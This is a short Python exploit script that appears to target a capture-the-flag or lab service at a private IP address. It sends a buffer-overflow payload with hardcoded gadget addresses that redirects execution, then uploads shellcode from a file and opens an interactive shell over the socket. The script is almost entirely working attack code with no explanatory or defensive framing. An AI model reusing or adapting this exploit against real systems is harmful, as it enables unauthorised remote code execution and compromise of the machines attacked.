import os
import random
import sys
import struct
import socket
import telnetlib
import time

host = "10.13.37.35"
port = 4003

##########################################################################
# Exploit start
##########################################################################

# Connect to remote host
s = socket.socket()
s.connect((host, port))

#raw_input("Go? ")
read_gadget = 0x8048581
write_gadget = 0x8048488
org_retaddr = 0x80485be

s.send("A" * 128 + "\x8f" + struct.pack('I', read_gadget) + "BBBB" + struct.pack('I', 0x804a040) + struct.pack('I', 0x01ffffff) + struct.pack('I', 0x804a040) * 128 + "\0")

f = open("shellcode.bin", "rb")
s.send(f.read())

# Give control to user
t = telnetlib.Telnet()
t.sock = s
t.interact()